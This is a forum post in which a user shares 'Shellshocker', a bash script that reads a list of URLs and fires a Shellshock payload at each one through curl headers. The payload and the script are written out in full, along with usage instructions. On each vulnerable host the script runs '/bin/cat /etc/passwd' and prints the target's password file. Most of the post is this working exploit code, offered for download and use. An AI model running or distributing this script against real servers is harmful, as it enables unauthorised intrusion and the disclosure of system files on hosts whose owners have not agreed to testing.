April 24, 2017, 08:14:23 AM
Welcome, Guest. Please login or register.

CMFP (Certified Metasploit Framework Professional) Course is out! http://www.top-hat-sec.com/cmfp.html

Author Topic: [Bash] Shellshocker, shellscript to test a list of URLs for the shellshock vuln.  (Read 515 times)

Offline Vector

  • Prospect
  • *
  • Posts: 37
  • Internets: +10/-24
    • @AntiSec_Inc
Like i mentioned in the other thread i recently posted. A while ago i'd been playing around with shellshock. So i thought it would be fun and useful to write a shellscript that takes in a list of URLs to be tested for the shellshock vulnerability.  It does so via curl by basically sending the payload:

Code: [Select]
'() { :; };echo;/bin/cat /etc/passwd

The results will be printed to the terminal but i have also included an option to save output to a list. Here's how to use the shellscript as i've originally written it in the README.md from my github repo.

Quote from: README.md
To use this script start shellshocker.sh from your terminal and select the 'List' option to specify a path to a list of URLs to be tested, in example

'Path to list: /tmp/list.txt',

After doing so you can select the 'Output' option to specify a location to which a copy of the script's output will be saved. This option is not mandatory however and output will be printed to the STDOUT regardless of whether it is set or not.

Finally after a list of URLs has been loaded you can test them for the shellshock vulnerability by selecting the 'Test' option. If any given host is vulnerable the contents of their /etc/passwd will be retrieved and printed to the terminal. Upon completion the script will exit.

The code for the script is below, however you can download or clone it directly from my repo as well if you're interested. https://github.com/NullArray/Shellshocker


Code: (bash) [Select]
#!/bin/bash

usage()
{ printf "%b \a\n\nSelect the 'List' option to specify a path to a list of URLs to be tested, in example 'Path to list: /tmp/list.txt',
after doing so you can select the 'Output' option to specify a location to which a copy of the script's output will be saved.
This option is not mandatory however and output will be printed to the terminal regardless of whether it is set or not.
Finally after a list of URLs has been loaded you can test them for the shellshock vulnerability by selecting the 'Test' option.
If any given host is vulnerable the contents of their /etc/passwd will be retrieved and printed to the terminal.
Upon completion the script will exit.
\n"
}


printf "%b" "\a\n\nTo use shellshocker please select an option below, select the 'Help' option for details on the script's functionality:\n"

PS3='Please enter your choice: '
options=("Output" "List" "Test" "Help" "Quit")
select opt in "${options[@]}"
do
    case $opt in
        "Output")
            read -p 'Location to save output to: ' outfile
            printf "%b \n"
            ;;
        "List")
            read -p 'Path to list: ' list
            printf "%b \n"
            ;;
        "Test")
            if [ "$list" == "" ]
            then
                echo "To test a list of URLs one needs to be supplied via the 'List' option"
                printf "%b \n"
            else
                cat $list | xargs -I % bash -c 'curl % -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" && echo ----END OF RESPONSE----' | tee $outfile
                printf "%b \a\n\n

Done, exiting.\n"
                break
            fi
            ;;
        "Help")
            usage
            ;;
        "Quit")
            break
            ;;
        *) echo invalid option;;
    esac
done

Here's a pic of the script in action.

« Last Edit: January 11, 2016, 12:19:08 PM by Vector »
"Words have no power to impress the mind without the exquisite horror of their reality"